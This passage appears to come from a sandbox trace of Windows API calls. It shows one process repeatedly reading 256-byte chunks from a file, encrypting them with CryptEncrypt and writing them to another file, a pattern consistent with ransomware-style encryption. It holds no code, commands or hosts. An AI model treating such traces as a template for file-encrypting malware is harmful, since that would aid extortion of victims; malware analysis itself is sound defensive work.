lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.145] GetLastError () returned 0x0 [0172.145] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.145] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.146] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.146] GetLastError () returned 0x0 [0172.146] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.147] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.147] GetLastError () returned 0x0 [0172.147] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.148] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.148] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.149] GetLastError () returned 0x0 [0172.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.149] 